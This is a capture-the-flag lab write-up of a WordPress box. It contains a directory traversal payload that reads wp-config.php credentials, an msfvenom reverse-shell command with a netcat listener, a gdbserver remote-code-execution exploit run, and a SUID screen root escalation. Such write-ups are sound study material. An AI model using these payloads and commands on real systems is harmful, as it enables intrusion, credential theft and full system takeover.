0x01 Introduction#
Target machine IP: 10.10.11.125.
Local machine IP: 10.10.16.21, mac m1.
0x02 Simple Information Gathering#
Using fscan port scanning, only ports 22 and 80 were found. With nmap scanning, another port 1337 was discovered, but it is uncertain what this port is used for.
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Accessing http://10.10.11.125/ reveals a WordPress website with version 5.8.1. The login address for the WordPress backend is http://backdoor.htb/wp-login.php.
The results from the wpsan scan did not provide any useful information.
Under the wp-content directory of WordPress, there is a plugins directory. Accessing http://10.10.11.125/wp-content/plugins/ reveals a php file and an eboo-download directory. Initially, it was thought that hello.php was a malicious file, but upon analysis, it was determined that it is not a malware. Since ebook-download is located in the plugins directory and readme.txt is present, it is confirmed to be a plugin.
0x03 Exploiting Vulnerabilities#
Searching for exploits on the website https://www.exploit-db.com/, a directory traversal vulnerability is found.
The proof of concept (PoC) is as follows:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Download the wp-config file.
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
This file contains the username and password for the database. Attempting to log in to the WordPress backend fails.
At this point, there are no further ideas. Upon examining wp, it is discovered that the service on port 1337 can be exploited directly for remote code execution (RCE). The gdbserver service is running on port 1337. The penetration of gdbserver can be referenced at: https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver, and the exploit script for gdbserver can be found at: https://www.exploit-db.com/exploits/50539.
Exploitation process:
- Download the exploit to the local machine.
- Generate shellcode using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
- Start local listener.
nc -lvp 1234
- Run the exploit.
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
Upgrade to an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color
Another method to determine the services running on the target server is to use the /proc/pid/cmdline file. This file is located in the proc directory and is named after the process ID (PID) of the running process.
By using Burp Suite to iterate through the PID and enumerate the services running on the target server.
0x04 Privilege Escalation#
Search for files running with suid set and owned by the root user. One such file is /usr/bin/screen.
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 Conclusion#
- Learned how to use arbitrary file read vulnerabilities to determine the services running on the target server, as well as knowledge about screen privilege escalation.
References:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174